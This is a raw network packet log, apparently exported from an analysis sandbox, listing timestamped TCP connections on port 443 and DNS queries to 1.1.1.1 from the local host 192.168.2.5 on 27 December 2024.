                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.695594072 CET50023443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.794961929 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.795172930 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.795191050 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796087980 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796143055 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796442986 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796497107 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796590090 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796597004 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796622992 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.796658993 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.831898928 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.831984997 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.832360029 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.832370043 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.833916903 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.833921909 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:45.839111090 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.130944967 CET4435002313.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.131079912 CET4435002313.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.131153107 CET50023443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.131450891 CET50023443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.131470919 CET4435002313.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.131480932 CET50023443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.131515026 CET50023443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.287264109 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.287532091 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.287611008 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291203976 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291289091 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291559935 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291718960 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291732073 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291759014 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291766882 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.291918993 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.307733059 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.307806015 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.307858944 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.308218002 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.308218002 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.308233976 CET4435002413.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.308274984 CET50024443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.335510969 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.335536003 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.382330894 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755177975 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755228043 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755249023 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755263090 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755280018 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755290985 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755295038 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755327940 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755386114 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755430937 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755494118 CET50026443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.755505085 CET44350026188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.776293993 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.776467085 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.776523113 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.777041912 CET50027443192.168.2.513.89.178.27
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.777061939 CET4435002713.89.178.27192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.936113119 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.936175108 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.936255932 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.936449051 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:46.936477900 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.533572912 CET44349953172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.533649921 CET44349953172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.533730030 CET49953443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.560740948 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.560826063 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:47.560885906 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.212248087 CET44349955162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.212299109 CET44349955162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.212343931 CET49955443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.352431059 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.352526903 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.352907896 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.352931023 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.354624987 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.354638100 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.354691982 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.354711056 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.679002047 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.679070950 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.679085970 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.679147005 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.680046082 CET50004443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.680088043 CET44350004188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.995136976 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.995170116 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.995251894 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.996016026 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:48.996032953 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.509435892 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.509501934 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.509505987 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.509552956 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.510350943 CET50034443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.510365009 CET44350034188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.757258892 CET49955443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:49.757271051 CET44349955162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.391323090 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.391376972 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.391994953 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.392002106 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393589973 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393594027 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393662930 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393680096 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393743038 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393759966 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393778086 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393788099 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393834114 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393856049 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393874884 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393878937 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393886089 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393932104 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393939018 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393954039 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393960953 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393981934 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:50.393985987 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:51.432452917 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:51.432488918 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:51.432569027 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:51.432761908 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:51.432773113 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.141671896 CET49953443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.141715050 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.141741991 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.141746044 CET44349953172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.147074938 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.147130966 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.147130966 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.147182941 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.149070024 CET50040443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.149085999 CET44350040188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.488456964 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.488485098 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.488552094 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.488739967 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.488755941 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.882555008 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.882636070 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.883080959 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.883090973 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.884726048 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.884730101 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.884763002 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:52.884768963 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.816468000 CET4434995923.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.816524982 CET49959443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.933526039 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.933590889 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.934010983 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.934020042 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.935551882 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.935558081 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.935604095 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.935616016 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.935873032 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.935894012 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.935975075 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.936069965 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.936610937 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.936625004 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.936678886 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:53.936685085 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:54.059453964 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:54.059544086 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:54.059617996 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:54.060707092 CET50050443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:54.060719013 CET44350050188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.351056099 CET4434996823.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.351139069 CET4434996823.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.351219893 CET49968443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.368128061 CET4434996723.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.368201017 CET4434996723.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.368309975 CET49967443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.782972097 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.783066988 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.783126116 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.784482002 CET50060443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:55.784502983 CET44350060188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:56.131108999 CET49968443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:56.131144047 CET4434996823.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:56.131258011 CET49967443192.168.2.523.209.72.40
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:56.131275892 CET4434996723.209.72.40192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.332314014 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.332428932 CET4435000023.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.332554102 CET50000443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.552609921 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.552723885 CET4435000123.44.201.19192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:59.552791119 CET50001443192.168.2.523.44.201.19
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.396617889 CET50089443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.396667004 CET44350089188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.396773100 CET50089443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.397042990 CET50089443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:02.397054911 CET44350089188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.842185020 CET44350089188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:02:03.842236996 CET50089443192.168.2.5188.245.216.205

                                                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:03.459307909 CET5356653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:03.693176031 CET53535661.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.126513004 CET6314653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:38.263519049 CET53631461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.315506935 CET6215753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:40.461776972 CET53621571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.663806915 CET53587591.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.711786032 CET5075253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.711991072 CET5266653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.720302105 CET53564341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.848560095 CET53507521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:56.848710060 CET53526661.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:00:59.587501049 CET53509521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:01.399615049 CET53558171.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:01.913806915 CET53578531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:23.668062925 CET6541053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:23.668354034 CET6473853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:23.806555986 CET53647381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:25.946657896 CET5774253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:25.946826935 CET5684453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.578464985 CET6506853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.578695059 CET5135453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.715428114 CET53650681.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:26.715895891 CET53513541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.476882935 CET5359053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.477464914 CET5585153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.478415012 CET6459353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.478415012 CET6024753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.484591961 CET5382253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.484750986 CET6035553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.590353012 CET5593753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.590555906 CET5144153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.593118906 CET6181853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.593380928 CET5718053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.594314098 CET6083353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.594470978 CET5426453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.614211082 CET53535901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.614339113 CET53558511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.615326881 CET53645931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.615375042 CET53602471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.621902943 CET53603551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.622060061 CET53538221.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.727411032 CET53559371.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.727423906 CET53514411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730139971 CET53618181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730242968 CET53571801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 27, 2024 07:01:28.730977058 CET53608331.1.1.1192.168.2.5
